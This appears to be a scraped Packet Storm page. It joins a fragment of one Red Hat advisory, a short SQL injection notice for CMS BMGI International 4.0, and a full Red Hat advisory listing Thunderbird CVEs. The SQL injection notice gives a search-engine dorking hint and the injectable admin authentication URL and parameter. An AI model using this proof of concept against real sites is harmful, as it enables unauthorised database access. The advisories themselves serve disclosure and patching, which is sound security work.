8XiAXUOPeUHBFiZzvpciVsFyncxs0WZgb1NQDgL6Vv8h76NcP/J0tANCSdgbx9/8  
sJN9g0DafCHIIARZt6VrL3c7XZuddRWbkcE85zbBlkUPl3rPl9mtsQdxIgbr88Ak  
usR/ZyZ6oCjVk3noBy1Rz8k3NnJnDlBJeXWFQR0EJfTpmL3WMMhX+X4Ifh0DMWzY  
0y1rQRzoyAo6bijwme2au/PA4pcKqvKTu8z0vyTTcsusrIxrm9iOAMKInyVOvRhW  
DpebdQcWPByy/IedCXG7vJ3lx/eoM+26rMeDek3/e+p6hHw2XAU+TajUMTVk0mu2  
h8OUNbkFfeqwoFbf+cD+  
=bNNg  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4541-01

CMS BMGI International version 4.0 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : CMS BMGI International v 4.0 Sql injection Vulnerability                                                           || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit)                                             || # Vendor    : https://batel.net/                                                                                                 |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+] inject here : /_Admin_root/authentification.php?lang=1&pw=1&user=yymfqisv[+] http://127.0.0.1/scimatdz/_Admin_root/authentification.php?lang=1&pw=1&user=yymfqisvGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

CMS BMGI International 4.0 SQL Injection

Red Hat Security Advisory 2023-4497-01 - Mozilla Thunderbird is a standalone mail and newsgroup client. This update upgrades Thunderbird to version 102.14.0. Issues addressed include buffer overflow, bypass, and spoofing vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: thunderbird security update  
Advisory ID:       RHSA-2023:4497-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4497  
Issue date:        2023-08-07  
CVE Names:         CVE-2023-3417 CVE-2023-4045 CVE-2023-4046  
                   CVE-2023-4047 CVE-2023-4048 CVE-2023-4049  
                   CVE-2023-4050 CVE-2023-4055 CVE-2023-4056  
                   CVE-2023-4057  
====================================================================  
1. Summary:

An update for thunderbird is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64

3. Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

This update upgrades Thunderbird to version 102.14.0.

Security Fix(es):

* Mozilla: Offscreen Canvas could have bypassed cross-origin restrictions  
(CVE-2023-4045)

* Mozilla: Incorrect value used during WASM compilation (CVE-2023-4046)

* Mozilla: Potential permissions request bypass via clickjacking  
(CVE-2023-4047)

* Mozilla: Crash in DOMParser due to out-of-memory conditions  
(CVE-2023-4048)

* Mozilla: Fix potential race conditions when releasing platform objects  
(CVE-2023-4049)

* Mozilla: Stack buffer overflow in StorageManager (CVE-2023-4050)

* Mozilla: Memory safety bugs fixed in Firefox 116, Firefox ESR 115.1,  
Firefox ESR 102.14, Thunderbird 115.1, and Thunderbird 102.14  
(CVE-2023-4056)

* Mozilla: Memory safety bugs fixed in Firefox ESR 115.1, and Thunderbird  
115.1 (CVE-2023-4057)

* thunderbird: File Extension Spoofing using the Text Direction Override  
Character (CVE-2023-3417)

* Mozilla: Cookie jar overflow caused unexpected cookie jar state  
(CVE-2023-4055)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of Thunderbird must be restarted for the update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2225325 - CVE-2023-3417 thunderbird: File Extension Spoofing using the Text Direction Override Character  
2228360 - CVE-2023-4045 Mozilla: Offscreen Canvas could have bypassed cross-origin restrictions  
2228361 - CVE-2023-4046 Mozilla: Incorrect value used during WASM compilation  
2228362 - CVE-2023-4047 Mozilla: Potential permissions request bypass via clickjacking  
2228363 - CVE-2023-4048 Mozilla: Crash in DOMParser due to out-of-memory conditions  
2228364 - CVE-2023-4049 Mozilla: Fix potential race conditions when releasing platform objects  
2228365 - CVE-2023-4050 Mozilla: Stack buffer overflow in StorageManager  
2228367 - CVE-2023-4055 Mozilla: Cookie jar overflow caused unexpected cookie jar state  
2228370 - CVE-2023-4056 Mozilla: Memory safety bugs fixed in Firefox 116, Firefox ESR 115.1, Firefox ESR 102.14, Thunderbird 115.1, and Thunderbird 102.14  
2228371 - CVE-2023-4057 Mozilla: Memory safety bugs fixed in Firefox ESR 115.1, and Thunderbird 115.1

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
thunderbird-102.14.0-1.el8_8.src.rpm

aarch64:  
thunderbird-102.14.0-1.el8_8.aarch64.rpm  
thunderbird-debuginfo-102.14.0-1.el8_8.aarch64.rpm  
thunderbird-debugsource-102.14.0-1.el8_8.aarch64.rpm

ppc64le:  
thunderbird-102.14.0-1.el8_8.ppc64le.rpm  
thunderbird-debuginfo-102.14.0-1.el8_8.ppc64le.rpm  
thunderbird-debugsource-102.14.0-1.el8_8.ppc64le.rpm

s390x:  
thunderbird-102.14.0-1.el8_8.s390x.rpm  
thunderbird-debuginfo-102.14.0-1.el8_8.s390x.rpm  
thunderbird-debugsource-102.14.0-1.el8_8.s390x.rpm

x86_64:  
thunderbird-102.14.0-1.el8_8.x86_64.rpm  
thunderbird-debuginfo-102.14.0-1.el8_8.x86_64.rpm  
thunderbird-debugsource-102.14.0-1.el8_8.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-3417  
https://access.redhat.com/security/cve/CVE-2023-4045  
https://access.redhat.com/security/cve/CVE-2023-4046  
https://access.redhat.com/security/cve/CVE-2023-4047  
https://access.redhat.com/security/cve/CVE-2023-4048  
https://access.redhat.com/security/cve/CVE-2023-4049  
https://access.redhat.com/security/cve/CVE-2023-4050  
https://access.redhat.com/security/cve/CVE-2023-4055  
https://access.redhat.com/security/cve/CVE-2023-4056  
https://access.redhat.com/security/cve/CVE-2023-4057  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJk0P2HAAoJENzjgjWX9erEiwgP/jUVVVd6QD4VPf1CzYuBBR4b  
z9soz0fFRJmKlULKr/TSJhEJ0HAU1vRHbOT2pEc/vQicwoWnpj3qRzUPJ2q0woCV  
m2wfGonzJ17hJNDdukXweN9Zu4PvmwD+fBgseCmdhd2qtK0r1IryoxqVA1L0kE8B  
Z9fKu9gUqjDqNM0ybltIDCKrSex2Im8sKEFX4/mC4qWOP30N6fF/UeCo4bw7LaLD  
TuLhDL15lGQQGaGlOp/W45siYNl+4ZQjYV315EL6hquSM/rdRmB4xs+AoxvlqSy8  
et74pq4Nt2OzSysOkk2ZGE76schOq1VAlaJ5pgPwTcp5+L4Hv2l48w+V8KMwoHpZ  
BdvuGqosLbugeHadAHsbKXPCvhTeZZ+Y/LfI15UwLWkJOoe0EVyUyyWUgwJYoFcA  
unSOkt43Gm//jzUxF5RFqwMRp3CqHxcWm9JtSiSm5g8AHvkpmEWam6KcDQLqsBDG  
JfxqPCz0abFoTNXyHTLAygGv57LL4xA8GfjMQdhdk+jBIFwaXmIxsPT4S/rFirCL  
LSgsf4RWr8vFQrzBSfdNI0BOswRU4ZhfqdBhOa+0tUeauDdXcDMJNmPaa+L2BZ0A  
O4WYqQShvqCBBlwtXDTa0favo89GZyn8q5qo3ddZHKgC6ukWxj1DFa8/UDQqARRm  
eZgizToOWRA/4FlUZ8q4  
=LPkR  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Source

Packet Storm